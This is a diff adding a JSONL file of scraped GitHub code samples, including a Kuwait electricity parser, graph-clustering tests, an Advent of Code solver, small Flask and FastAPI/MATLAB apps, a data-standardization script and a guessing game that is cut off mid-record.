diff --git "a/4117.jsonl" "b/4117.jsonl" new file mode 100644--- /dev/null +++ "b/4117.jsonl" @@ -0,0 +1,1252 @@ +{"seq_id":"40798485267","text":"from . import *\n\nclass Switch(BaseLayer):\n \"\"\"\n Class representing a Switch in Sketch\n \"\"\"\n def parse_elem(self, elem):\n rect = None\n\n for child in elem[\"children\"]:\n if utils.word_in_str(\"bound\", child[\"id\"]):\n rect = child\n\n if rect is None:\n raise Exception(\"Switch: No bound in switch.\")\n\n elem[\"is_on\"] = utils.word_in_str(\"off\", elem[\"id\"])\n elem[\"rect\"] = rect\n return super().parse_elem(elem)\n","repo_name":"pixelcodeio/pixelcode","sub_path":"app/src/pixelcode/plugin/layers/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9870293657","text":"#!/usr/bin/env python3\n\"\"\"\nThis parser returns Kuwait's electricity system load (assumed to be equal to electricity production)\nSource: Ministry of Electricity and Water / State of Kuwait\nURL: https://www.mew.gov.kw/en/\nScroll down to see the system load gauge\nShares of Electricity production in 2017: 65.6% oil, 34.4% gas (source: IEA; https://www.iea.org/statistics/?country=KUWAIT&indicator=ElecGenByFuel)\n\"\"\"\n\nimport re\nfrom datetime import datetime\nfrom logging import Logger, getLogger\n\nimport arrow\nfrom requests import Session\n\n\ndef fetch_consumption(\n zone_key: str = \"KW\",\n session: Session | None = None,\n target_datetime: datetime | None = None,\n logger: Logger = getLogger(__name__),\n):\n if target_datetime:\n raise NotImplementedError(\"This parser is not yet able to parse past dates\")\n\n r = session or Session()\n url = \"https://www.mew.gov.kw/en\"\n response = r.get(url)\n load = re.findall(r\"\\((\\d{4,5})\\)\", response.text)\n load = int(load[0])\n consumption = load\n\n datapoint = {\n \"zoneKey\": zone_key,\n \"datetime\": arrow.now(\"Asia/Kuwait\").datetime,\n \"consumption\": consumption,\n \"source\": \"mew.gov.kw\",\n }\n\n return datapoint\n\n\nif __name__ == \"__main__\":\n \"\"\"Main method, never used by the electricityMap backend, but handy for testing.\"\"\"\n\n print(\"fetch_consumption() ->\")\n print(fetch_consumption())\n","repo_name":"electricitymaps/electricitymaps-contrib","sub_path":"parsers/KW.py","file_name":"KW.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":3126,"dataset":"github-code","pt":"21"} +{"seq_id":"11833786435","text":"##hhh=[1,2,3,4,5,\"abababab\"]\n##print(hhh)\n##for each in hhh:\n## print(each)\n##hhh[1]\n##hhh[-6]\n\n#增\n##heros=[\"ironman\",\"hulk\"]\n##heros.append(\"blackwidow\")#每次放一个\n##heros.extend([\"a\",\"b\",\"c\"])#放一堆\n\ns=[1,2,3,4,5]\ns[len(s):]=[6]\ns[len(s):]=[7,8,9]\nprint(s)\n\n#insert\ns=[1,3,4,5]\ns.insert(1,2)\ns.insert(0,0)\ns.insert(len(s),6)\nprint(s)\n\n#remove\ns.remove(5)\nprint(s)\n\ns.pop(5)\ns.clear()\nprint(s)\n","repo_name":"RINONIN/mangshe","sub_path":"foundation/character_.py","file_name":"character_.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26489950160","text":"\"\"\"Tests for the clustering algorithms.\"\"\"\nimport scipy.sparse\nimport pytest\nimport numpy as np\nfrom context import stag\nimport stag.graph\nimport stag.cluster\nimport stag.random\nimport stag.utility\n\n# Define the adjacency matrices of some useful graphs.\nC4_ADJ_MAT = 
scipy.sparse.csc_matrix([[0, 1, 0, 1], [1, 0, 1, 0], [0, 1, 0, 1], [1, 0, 1, 0]])\nK6_ADJ_MAT = scipy.sparse.csc_matrix([[0, 1, 1, 1, 1, 1], [1, 0, 1, 1, 1, 1], [1, 1, 0, 1, 1, 1],\n [1, 1, 1, 0, 1, 1], [1, 1, 1, 1, 0, 1], [1, 1, 1, 1, 1, 0]])\nBARBELL5_ADJ_MAT = scipy.sparse.csc_matrix([[0, 1, 1, 1, 1, 0, 0, 0, 0, 0],\n [1, 0, 1, 1, 1, 0, 0, 0, 0, 0],\n [1, 1, 0, 1, 1, 0, 0, 0, 0, 0],\n [1, 1, 1, 0, 1, 0, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 0, 0, 1, 0, 1, 1, 1],\n [0, 0, 0, 0, 0, 1, 1, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1, 1, 0, 1],\n [0, 0, 0, 0, 0, 1, 1, 1, 1, 0],\n ])\n\ndef test_spectral_clustering():\n graph = stag.graph.barbell_graph(10)\n labels = stag.cluster.spectral_cluster(graph, 2)\n gt_labels = stag.random.sbm_gt_labels(20, 2)\n assert stag.cluster.adjusted_rand_index(gt_labels, labels) == 1\n\n\ndef test_cheeger_cut():\n graph = stag.graph.barbell_graph(10)\n labels = stag.cluster.cheeger_cut(graph)\n gt_labels = stag.random.sbm_gt_labels(20, 2)\n assert stag.cluster.adjusted_rand_index(gt_labels, labels) == 1\n\n\ndef test_default_local_clustering():\n # Construct a graph object with the barbell adjacency matrix\n graph = stag.graph.Graph(BARBELL5_ADJ_MAT)\n\n # Find a local cluster near the first vertex\n cluster = stag.cluster.local_cluster(graph, 1, 21)\n\n # Assert that the correct clusters have been found.\n assert (set(cluster) == {0, 1, 2, 3, 4})\n\n\ndef test_local_clustering_float_weight():\n # Construct a graph object with the barbell adjacency matrix\n graph = stag.graph.Graph(BARBELL5_ADJ_MAT)\n\n # Find a local cluster near the first vertex\n cluster = stag.cluster.local_cluster(graph, 1, 20.23)\n\n # Assert that the correct clusters have been found.\n assert (set(cluster) == {0, 1, 2, 3, 4})\n\n\ndef test_acl_local_clustering():\n # Construct a graph object with a well-defined cluster structure\n graph = stag.graph.barbell_graph(10)\n\n # Run the acl clustering method\n cluster = stag.cluster.local_cluster_acl(graph, 0, 0.9, 0.0001)\n\n # Check that we found one of the clusters\n expected_cluster = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9}\n\n assert set(cluster) == expected_cluster\n\n\ndef test_approximate_pagerank():\n # For easier manual verification, we use a cycle graph with 0.5 weights on the edges\n adj = 0.5 * stag.graph.cycle_graph(4).adjacency()\n graph = stag.graph.Graph(adj)\n\n # Construct seed matrix.\n s = stag.utility.SprsMat([[1, 0, 0, 0]]).transpose()\n\n # Run the personalised pagerank and check that we get the right result\n p, r = stag.cluster.approximate_pagerank(graph, s, 1./3, 1./8)\n expected_p = [41./81, 2./27, 0, 2./27]\n expected_r = [5./81, 2./27 + 5./162, 2./27, 2./27 + 5./162]\n np.testing.assert_almost_equal(p.to_dense().transpose().tolist()[0], expected_p)\n np.testing.assert_almost_equal(r.to_dense().transpose().tolist()[0], expected_r)\n\n\ndef test_approximate_pagerank_no_push():\n # Test the behaviour of the approximate pagerank method when there is no\n # push operation.\n graph = 3 * stag.graph.cycle_graph(4)\n\n # Construct seed matrix.\n s = scipy.sparse.lil_matrix((1, 1))\n s[0, 0] = 1\n\n # Run the personalised pagerank and check that we get the right result\n p, r = stag.cluster.approximate_pagerank(graph, s.tocsc(), 1./3, 1./2)\n expected_p = [0]\n expected_r = [1]\n np.testing.assert_almost_equal(p.to_dense().transpose().tolist()[0], expected_p)\n np.testing.assert_almost_equal(r.to_dense().transpose().tolist()[0], expected_r)\n\n\ndef test_sweep_set():\n # Construct a 
simple graph to test with\n graph = stag.graph.barbell_graph(4)\n\n # Create the vector to test. The optimal conductance will be the first 4 vertices\n s = scipy.sparse.lil_matrix((8, 1))\n s[0, 0] = 0.1\n s[1, 0] = 0.25\n s[2, 0] = 0.2\n s[3, 0] = 0.15\n s[4, 0] = 0.05\n \n # Compute the sweep set\n sweep_set = stag.cluster.sweep_set_conductance(graph, s)\n assert type(sweep_set) == np.ndarray\n assert set(sweep_set) == {0, 1, 2, 3}\n\n\ndef test_connected_component():\n # Construct a graph with two connected components.\n graph = stag.random.sbm(10, 2, 1, 0)\n cc = stag.cluster.connected_component(graph, 0)\n assert type(cc) == np.ndarray\n assert set(cc) == {0, 1, 2, 3, 4}\n\n\ndef test_connected_components():\n # Construct a graph with two connected components\n graph = stag.random.sbm(10, 2, 1, 0)\n ccs = stag.cluster.connected_components(graph)\n assert type(ccs) == type([[1]])\n assert type(ccs[0]) == np.ndarray\n assert set(ccs[0]) == {0, 1, 2, 3, 4}\n assert set(ccs[1]) == {5, 6, 7, 8, 9}\n\n\ndef test_ari():\n gt_labels = [0, 0, 1, 1, 1, 1, 2, 2, 2, 2]\n labels = [0, 1, 0, 1, 1, 2, 2, 2, 2, 2]\n expected_ari = 0.31257344\n actual_ari = stag.cluster.adjusted_rand_index(gt_labels, labels)\n assert actual_ari == pytest.approx(expected_ari, 0.0001)\n\n # Check that we can pass numpy ndarray to the adjusted rand index\n # method\n labels = np.asarray(labels)\n actual_ari = stag.cluster.adjusted_rand_index(gt_labels, labels)\n assert actual_ari == pytest.approx(expected_ari, 0.0001)\n\n gt_labels = np.asarray(gt_labels)\n actual_ari = stag.cluster.adjusted_rand_index(gt_labels, labels)\n assert actual_ari == pytest.approx(expected_ari, 0.0001)\n\n\ndef test_nmi():\n gt_labels = [0, 0, 1, 1, 1, 1, 2, 2, 2, 2]\n labels = [0, 1, 0, 1, 1, 2, 2, 2, 2, 2]\n expected_nmi = 0.4558585\n actual_nmi = stag.cluster.normalised_mutual_information(gt_labels, labels)\n assert actual_nmi == pytest.approx(expected_nmi, 0.0001)\n\n # Check that we can call with numpy arrays\n actual_nmi = stag.cluster.normalised_mutual_information(np.asarray(gt_labels),\n np.asarray(labels))\n assert actual_nmi == pytest.approx(expected_nmi, 0.0001)\n\n # Check the exact clustering\n labels = [1, 1, 2, 2, 2, 2, 0, 0, 0, 0]\n actual_nmi = stag.cluster.normalised_mutual_information(gt_labels, labels)\n assert actual_nmi == 1\n\n\ndef test_conductance():\n g = stag.graph.barbell_graph(5)\n cluster = [0, 1, 2, 3, 4]\n expected_cond = 1/21\n cond = stag.cluster.conductance(g, cluster)\n assert cond == pytest.approx(expected_cond, 0.0001)\n\n # Try with an ndarray cluster\n cluster = np.asarray(cluster)\n cond = stag.cluster.conductance(g, cluster)\n assert cond == pytest.approx(expected_cond, 0.0001)\n\n\ndef test_sym_diff():\n s = [1, 4, 5, 2, 6]\n t = [1, 5, 3, 7]\n sym_diff = stag.cluster.symmetric_difference(s, t)\n assert set(sym_diff) == {2, 3, 4, 6, 7}\n\n # Check that ndarray arrays work\n s = np.asarray(s)\n t = np.asarray(t)\n sym_diff = stag.cluster.symmetric_difference(s, t)\n assert set(sym_diff) == {2, 3, 4, 6, 7}\n","repo_name":"staglibrary/stagpy","sub_path":"test/test_clustering.py","file_name":"test_clustering.py","file_ext":"py","file_size_in_byte":7559,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"14969791217","text":"from pathlib import Path\n\n\ndef decode(code):\n l, r = 0, (1 << len(code))-1\n for ch in code:\n mid = l + (r-l)//2\n if ch == '0':\n r = mid\n else:\n l = mid+1\n return l\n\n\ndef calculate_seatid(row_number, col_number):\n 
+{"seq_id":"14969791217","text":"from pathlib import Path\n\n\ndef decode(code):\n    l, r = 0, (1 << len(code))-1\n    for ch in code:\n        mid = l + (r-l)//2\n        if ch == '0':\n            r = mid\n        else:\n            l = mid+1\n    return l\n\n\ndef calculate_seatid(row_number, col_number):\n    return row_number*8+col_number\n\n\ndef part1(seat_codes):\n    return max(calculate_seatid(decode(row_code), decode(col_code)) for row_code, col_code in seat_codes)\n\n# We can also use a sorted list, but time complexity will be O(NlogN) instead of O(N)\n\n\ndef part2(seat_codes):\n    seatids = set([calculate_seatid(decode(row_code), decode(col_code))\n                   for row_code, col_code in seat_codes])\n    l, r = min(seatids), max(seatids)\n    for seatid in range(l+1, r):\n        if seatid not in seatids:\n            return seatid\n    return -1\n\n\ndef process_input(file):\n    def process_code(code):\n        code = code.replace('F', '0').replace(\n            'L', '0').replace('B', '1').replace('R', '1')\n        return code[:-3], code[-3:]\n\n    return [(row_code, col_code) for row_code, col_code in [process_code(line.rstrip()) for line in file]]\n\n\nif __name__ == \"__main__\":\n    script_path = Path(__file__).resolve()\n    input_path = script_path.parent / '../inputs' / f'{script_path.stem}.txt'\n\n    with input_path.open('r') as f:\n        seat_codes = process_input(f)\n        print(\"Part 1:\", part1(seat_codes))\n        print(\"Part 2:\", part2(seat_codes))\n","repo_name":"FusionX9000/Advent-of-Code-2020","sub_path":"solutions/Day5.py","file_name":"Day5.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"20808280195","text":"# CircleTable - Yusuf Elsharawy, Christopher Liu, Naomi Naranjo\n# SoftDev\n# K14 -- Form and Function\n# 2021-10-14\n\nfrom flask import Flask  # Facilitate flask webserving\nfrom flask import render_template  # Facilitate jinja templating\nfrom flask import request  # Facilitate form submission\n\n# Create Flask object\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef disp_loginpage():\n    \"\"\"Returns the login page.\"\"\"\n    return render_template(\"login.html\")\n\n\n@app.route(\"/auth\", methods=[\"GET\"])\ndef authenticate():\n    \"\"\"Returns the responge page, including the username, request method, and\n    greeting.\"\"\"\n    if app.debug:\n        print(\"\\n\\n\\n\")\n        print(\"***DIAG: this Flask obj ***\")\n        print(app)\n        print(\"***DIAG: request obj ***\")\n        print(request)\n        print(\"***DIAG: request.args ***\")\n        print(request.args)\n    return render_template(\n        \"response.html\", username=request.args[\"username\"], method=request.method\n    )\n\n\nif __name__ == \"__main__\":  # False if this file imported as module\n    # Enable debugging, auto-restarting of server when this file is modified\n    app.debug = True\n    app.run()\n","repo_name":"Clue88/softdev-workshop","sub_path":"14_form/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70345738294","text":"from src.models.wardDb import WardDb\nfrom src.models.accountDb import AccountDb\nimport re\n\n\n# so sánh chuỗi với chuỗi regex\ndef validate_regex(input_string, regex):\n    pattern = re.compile(regex)\n    if pattern.fullmatch(input_string):\n        return True\n    return False\n\n\nclass WardServices:\n\n    # Tìm 1 phường/xã trong 1 quận/huyện\n    @staticmethod\n    def exist_ward(id_acc, ward_id: str):\n        # Validate ward_id , đầu vào có 6 chữ số\n        regex_id = '^(0[1-9]|[1-9][0-9]){3}$'\n        if not validate_regex(ward_id, regex_id):\n            return 0 # Invalid ward_id\n        elif id_acc != ward_id[0:4]:\n            return 1 # not authorized\n        ward = WardDb.find_by_id(ward_id)\n        if ward:\n            return ward\n        return None # ward not exist\n\n    # Cấp mã cho 1 xã/phường trong 1 huyện -> cấp 2 số\n    @staticmethod\n    def create_ward(id_acc: str, data: dict):\n        ward_id = data[\"wardId\"]\n        ward_name = data[\"wardName\"]\n\n        # Validate ward_id (đầu vào là 2 số)\n        regex_id = '^(0[1-9]|[1-9][0-9])$'\n        if not validate_regex(ward_id, regex_id):\n            return 0 # Invalid ward_id\n\n        # wardId lưu ở database là 6 số\n        data[\"wardId\"] = id_acc + ward_id\n        if WardDb.find_by_dist_ward_name(id_acc, ward_name):\n            return 1 # Tên xã/phường đã có trong quận/huyện\n        if WardDb.find_by_id(data[\"wardId\"]):\n            return 2 # Id đã được cấp cho xã khác\n        w = WardDb(wardId=data[\"wardId\"], wardName=ward_name, districtId=id_acc, completed=None)\n        try:\n            w.save_to_db()\n        except:\n            return 3 # error save\n        return 4 # added\n\n    # Xoá 1 xã/phường khỏi danh sách\n    @staticmethod\n    def delete_ward(ward: WardDb):\n        try:\n            ward.delete_from_db()\n        except:\n            return 1 # err\n        return 0 # deleted\n\n    # Sửa thông tin 1 xã/phường\n    @staticmethod\n    def update_ward(id_acc: str, ward: WardDb, data: dict):\n        ward_name = data[\"wardName\"]\n\n        if ward_name == ward.wardName:\n            return 0 # not change\n        elif WardDb.find_by_dist_ward_name(id_acc, ward_name):\n            return 1 # Name update already exists in other ward\n        try:\n            ward.wardName = ward_name\n            ward.save_to_db()\n        except:\n            return 2 # error\n        return None # updated\n\n    # cập nhật tiến độ\n    @staticmethod\n    def completed(id_acc: str, data: dict):\n        ward = WardDb.find_by_id(id_acc)\n        completed = data[\"completed\"]\n        if ward:\n            if completed == ward.completed:\n                return 2 # not change\n            try:\n                ward.completed = completed\n                ward.save_to_db()\n            except:\n                return 3 # error\n            return None # updated\n\n    # List xã/phường\n    @staticmethod\n    def list_ward_in_district(dist_id: str):\n        # validate\n        regex_id = '^(0[1-9]|[1-9][0-9]){2}$'\n        if not validate_regex(dist_id, regex_id):\n            return 0 # Invalid dist_id\n        wards = WardDb.find_by_district_id(dist_id)\n        if wards:\n            return wards\n        return None\n\n    @staticmethod\n    def list_ward_progress(id: str):\n        \"\"\"\n        list wards managed by a specific district account\n        no need to validate since input of this function is generated by backend\n        :param id: account id\n        :return: query result\n        \"\"\"\n        return WardDb.find_join_account(id)\n\n    @staticmethod\n    def list_ward_allocated(id: str):\n        \"\"\"\n        list wards managed by a specific district account\n        no need to validate since input of this function is generated by backend\n        :param id: account id\n        :return: query result\n        \"\"\"\n        return WardDb.find_join_account_allocated(id)\n\n    @staticmethod\n    def list_ward_progress_specific(id_acc, id_req):\n        \"\"\"\n        list a specific ward managed by a specific district account\n        no need to validate since input of this function is generated by backend\n        :param id_acc: account id\n        :param id_req: ward request id\n        :return: query result\n        \"\"\"\n        return WardDb.find_join_account_specific(id_acc, id_req)\n\n    @staticmethod\n    def count_completed_wards(id_district):\n        \"\"\"\n        count total completed ward given a specific district\n        :param id_district: id district\n        :return: query result\n        \"\"\"\n        return WardDb.count_completed(id_district)\n\n    @staticmethod\n    def count_total_wards(id_district):\n        \"\"\"\n        count total ward given a specific district\n        :param id_district: id district\n        :return: query result\n        \"\"\"\n        return WardDb.count_total(id_district)\n\n    @staticmethod\n    def get_ward_name(id):\n        return str(WardDb.find_ward_name(id)[0])\n\n    @staticmethod\n    def get_ward_completed(id):\n        return WardDb.find_by_id(id).completed\n\n    @staticmethod\n    def check_exist(id):\n        return int(WardDb.check_exist(id)) > 0\n","repo_name":"theminkantoso/citizenV.server","sub_path":"src/services/ward.py","file_name":"ward.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"43213131397","text":"from typing import Optional\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom matlab_interface import MatlabInterface\nfrom utils import Utils\nfrom session import Session\nfrom fastapi.middleware.cors import CORSMiddleware\n\nimport json\nimport os\nimport os.path\n\ntags_metadata = [\n    {\n        \"name\": \"main\",\n        \"description\": \"Operations needed for the main application\",\n    },\n    {\n        \"name\": \"extra\",\n        \"description\": \"\",\n    }\n]\n\napp = FastAPI(title=\"Matlab Online Workspace API\")\n\norigins = [\n    \"http://localhost:4200\",\n]\n\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=origins,\n    allow_credentials=True,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"],\n)\n\nMAX_SESSIONS = 3\nHOME = 'D:\\\\Dropbox\\\\tfg\\\\Shazam-MATLAB\\\\app\\\\'\n\nutils = Utils()\nsessions = [Session(i) for i in range(1, MAX_SESSIONS+1)]\n\n\n@app.get(\"/\")\ndef read_root():\n    return {\"Add /docs to URL to acces Matlab Online Workspace API\"}\n\n\ndef getSession(sid: int):\n    availables = list(\n        filter(lambda s: s.sid == sid, sessions))\n    return availables[0] if len(availables) > 0 else None\n\n\n@app.get(\"/sessions\", tags=[\"main\"])\ndef getSessions():\n    return {\"sessions\": [s.toJSON() for s in sessions]}\n\n\n@app.get(\"/taskList\", tags=[\"main\"])\ndef tasklist():\n    tasks = utils.taskList()\n    return utils.toJSON(tasks)\n\n\n@app.get(\"/newSession\", tags=[\"main\"])\ndef newSession():\n    availables = list(filter(lambda s: s.pid is None, sessions))\n    itsNotFull = len(availables) > 0\n\n    if itsNotFull:\n        utils.printS('Available Sessions:', availables)\n        s = availables[0]\n        index = sessions.index(s)\n        sessions.pop(index)\n        print('Initializing Matlab Session '+str(s.sid)+'...')\n        s.matlab = MatlabInterface()\n        s.pid = s.matlab.run_command(\"clear,feature('getpid')\", False)\n        s.matlab.run_command(\"clear,path(path,'D:\\\\Dropbox\\\\tfg\\\\Shazam-MATLAB\\\\app\\\\')\", False)\n        message = 'New Matlab process with PID='+s.pid\n        sessions.insert(index, s)\n        utils.printS('Updated Sessions: '+message, sessions)\n        response = {\"result\": message, \"session\": s.toJSON()}\n    else:\n        message = 'No available sessions'\n        response = {\"result\": message}\n    return response\n\n\n@app.get(\"/startMatlab\", tags=[\"main\"])\ndef startMatlab(sid: int):\n    response = None\n    s = getSession(sid)\n\n    isItAvailable = (s is not None) & (s.pid is None)\n\n    if isItAvailable:\n        utils.printS('Selected Session:', [s])\n        index = sessions.index(s)\n        sessions.pop(index)\n        print('Initializing Matlab Session '+str(sid)+'...')\n        s.matlab = MatlabInterface()\n        #s.matlab.run_command('checkStart')\n        s.pid = s.matlab.run_command(\"clear,feature('getpid')\", False)\n        s.matlab.run_command('clear', False)\n        message = 'New Matlab process with PID='+s.pid\n        sessions.insert(index, s)\n\n        utils.printS('Updated Sessions: '+message, sessions)\n        response = {\"result\": message, \"session\": s.toJSON()}\n    else:\n        message = 'Session ' + str(sid)+' not available, already running PID=' + str(s.pid)\n        response = {\"result\": message}\n        print(message)\n    return response\n\n\n@app.get(\"/stopMatlab\", tags=[\"main\"])\ndef stopMatlab(sid: int, restart: Optional[bool] = False):\n    option = ' Restart ' if restart else ' Stop '\n    print('Session '+str(sid)+option+'Selected')\n    session = getSession(sid)\n    if hasattr(session, 'matlab') & (session.pid is not None):\n        session.matlab.stop()\n        session.pid = None\n        session.matlabPID = None\n        session.matlab = None\n        msg = 'Session '+str(sid) + ' stopped'\n        response = startMatlab(session.sid) if restart else {\"result\": msg}\n    else:\n        msg = 'Session '+str(sid) + ' is not currently running!'\n        response = {\"result\": msg}\n    print(msg)\n    return response\n\n\n@app.get(\"/run\", tags=[\"main\"])\ndef run(sid: int, commands: str):\n    session = getSession(sid)\n    figures = []\n    if hasattr(session, 'matlab') & (session.pid is not None):\n        print('Session '+str(sid)+': ')\n        res = session.matlab.run_command(commands, True)\n        figures = session.matlab.run_command('figures', False)\n        try:\n            figures = figures.replace('\\r', '').replace('\\n', '')\n        except:\n            figures = figures\n        try:\n            result = json.loads(res, strict=False)\n        except:\n            result = res\n        try:\n            figures = json.loads(figures, strict=False)\n        except:\n            figures = figures\n    else:\n        result = 'Session '+str(sid) + ' is not currently running!'\n    return {\"result\": result, \"figures\": figures}\n\n\n@app.get(\"/getJSON\", tags=[\"extra\"])\ndef getJSON(fileName: str):\n    with open(HOME+'db\\\\json\\\\'+fileName, 'r') as f:\n        res = f.read()\n        jsonRes = json.loads(res, strict=False)\n    return jsonRes\n\n\n@app.get(\"/shouldUpdate\", tags=[\"extra\"])\ndef should_update():\n    shouldUpdate = True\n    musicDir = HOME+'music'\n    fileNames = [filename for filename in os.listdir(musicDir)\n                 if os.path.isfile(os.path.join(musicDir, filename))]\n\n    importedFiles = getJSON('metadata.json')\n    sameSize = len(fileNames) <= len(importedFiles)\n\n    if sameSize:\n        for f in fileNames:\n            found = list(filter(lambda i: f in i['Filename'], importedFiles))\n            if len(found) > 0:\n                shouldUpdate = False\n            else:\n                shouldUpdate = True\n                break\n\n    return shouldUpdate\n\n\n@app.post(\"/addTracks\", tags=[\"extra\"])\ndef add_tracks(sid: int):\n    session = getSession(sid)\n    if hasattr(session, 'matlab') & (session.pid is not None):\n        res = session.matlab.run_script('justAddTracks')\n        print(res)\n        result = getJSON('metadata.json')\n    else:\n        result = 'Session '+str(sid) + ' is not currently running!'\n    return {\"result\": result}\n\n\n@app.post(\"/test_shazam\", tags=[\"extra\"])\ndef test_shazam(sid: int, duration: Optional[int] = 3, wipe: Optional[bool] = False):\n    session = getSession(sid)\n    if hasattr(session, 'matlab') & (session.pid is not None):\n        if wipe | should_update():\n            print('Adding tracks...')\n            add_tracks(sid)\n\n        command = \"test_shazam {} {}\".format(duration, 0)\n        result = session.matlab.run_command(command, True)\n        print(result)\n        print(json.loads(result))\n    else:\n        result = 'Session '+str(sid) + ' is not currently running!'\n    return {\"result\": json.loads(result)}\n","repo_name":"nilodude/mow-api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10941446365","text":"\"\"\"\r\nModule to get standarized data set\r\n\"\"\"\r\n\r\nimport reader\r\nimport math\r\nimport pandas as pd\r\n\r\nz_matrix=[]\r\nmatrix = reader.get_matrix()\r\nprint('Building z_matrix...')\r\n\r\n#returns n column from the matrix, without the heading\r\ndef get_col(col_number): \r\n    array =[]\r\n    for row in matrix:\r\n        array.append(row[col_number])\r\n    return array[1:]\r\n\r\n#get mean from an array\r\ndef mean(array):\r\n    total=0\r\n    for i in array:\r\n        total=total + float(i)\r\n    return total/len(array)\r\n\r\ndef standardDeviation(array, mean):\r\n    total=0\r\n    for i in array:\r\n        total += (float(i)- float(mean))*(float(i) - float(mean))\r\n\r\n    total=total/(len(array)-1)\r\n    total=math.sqrt(total)\r\n    return total\r\n\r\ndef zscore(element,mean,deviation):\r\n    return (float(element)-float(mean))/float(deviation)\r\n\r\n#create a new 'z_matrix' with each value normalized\r\ndef normalization():\r\n    z_matrix.append(matrix[0])\r\n    for i in range(1,len(matrix)):\r\n        row=[]\r\n        row.append(matrix[i][0])\r\n        row.append(matrix[i][1])\r\n        for j in range(2,len(matrix[0])): \r\n            col=get_col(j)\r\n            x=matrix[i][j] \r\n            m=mean(col)\r\n            d=standardDeviation(col,m)\r\n            row.append(round(zscore(x,m,d),2))\r\n        z_matrix.append(row)\r\n    \r\n\r\ndef get_z_matrix():\r\n    return z_matrix\r\n\r\ndef to_csv():\r\n    df = pd.DataFrame(z_matrix)\r\n    df=df.drop(0) #delete headers\r\n    df=df.drop(0,axis=1) #delete 'id' column\r\n    df.to_csv(\"z_matrix.csv\", header=None, index=None)\r\n    print('z_matrix.csv created!')\r\n\r\nnormalization()\r\nto_csv()\r\n\r\n\r\n\r\n\r\n","repo_name":"jmguevara/Proyecto1_IA","sub_path":"standardization.py","file_name":"standardization.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"25124196895","text":"import random\nimport os\nimport sys\nfrom time import sleep\n\n# Pogadjanje broja, svaki put kad pocne partija dato je 5 poena, na svaku gresku se oduzima jedan i ako se stigne do 0, racunar je pobedio, ako ne, korisnik je pobedio i ispisuje se rezultat\n# Ako je na kraju broj poena veci(ili jednak) od proslog High Score, prosli highscore = broj poena i ispisuje se datum i vreme u kojem ja napravljen novi highscore, highscore se moze prikazati pritiskom na taster 2 iz glavnog menija\n# Ideja - postoji text file iz koga ce se citati highscore i tako omoguciti da se highscore sacuva i nakon gasenja programa.\n\ntry:\n    file = open('high_score.txt', 'r')\n    high_score = file.read()\n    high_score = int(high_score[0])\n    file.close()\nexcept:\n    high_score = 0\n\ndef menu():\n    os.system('cls')\n    print(\"Enter your choice:\")\n    print(\"1. Play\\n2. High Scores\\n3. Exit game\\n\")\n    menu_choice = input()\n    while menu_choice not in [\"1\", \"2\", \"3\"]:\n        print(\"Invalid choice, please choose between 1, 2 and 3...\")\n        menu_choice = input()\n    if(menu_choice == \"1\"):\n        game()\n    elif(menu_choice == \"2\"):\n        high_scores()\n    else:\n        exit()\n    \n    \n\ndef game():\n    os.system('cls')\n    global name\n    name = input(\"What's your name? \\n\")\n    print(f\"Hello {name}, welcome to the game!\\n\")\n\n    play_game = input(\"Do you want to play the game? Answer with a simple yes/no\\n\").lower()\n\n    if(play_game == \"no\"):\n        print(\"Okay, have a good one.\")\n        exit\n    elif(play_game == \"yes\"):\n        print(\"Starting the game...\")\n        game_start()\n    else:\n        print(\"That's not a valid option...\")\n        exit()\n    \ndef game_start():\n    global high_name\n    global high_score\n    global points\n    os.system('cls')\n    choice = 1\n    points = 5\n    again = \"yes\"\n\n    random_num = random.randint(1, 10)\n    print(\"This is a number guessing game, each time you play you'll be guessing a random number that i generated (1-10).\\nAfter each miss, your points will be deducted, and if you reach zero... i win.\")\n    sleep(1) # PUT BACK TO 7\n    while points > 0 and again == \"yes\":\n        os.system('cls')\n        print(random_num) # REMOVE\n        guess = int(input(\"Input your guess: \"))\n        if(guess != random_num):\n            print(\"Mistake.\")\n            points = points - 1\n            print(f\"Total points: {points}\",)\n            if(points == 0):\n                print(\"You lose...\")\n                sleep(1)\n                exit()\n            else:\n                sleep(1)\n        else:\n            print(f\"Goodjob, you guessed the number! Total amount of points {points}\")\n            num = high_score\n            if(points > num):\n                num = points\n                high_name = name\n            again = input(\"Do you want to play again? yes/no...\\n\").lower()\n            points = 5\n            while again not in [\"yes\", \"no\"]:\n                again = input(\"Invalid choice, Do you want to play again? yes/no...\\n\").lower()\n            os.system('cls')\n    print(\"Farewell...\")\n    high_score = num\n    high_score = str(high_score)\n    sleep(1)\n    file = open('high_score.txt', 'w')\n    file.write(high_score + f\" - {high_name}\")\n    file.close()\n    menu()\n\ndef high_scores():\n    file = open('high_score.txt', 'r')\n    high_score = file.read()\n    file.close()\n    os.system('cls')\n    try:\n        print(f\"Current highscore: 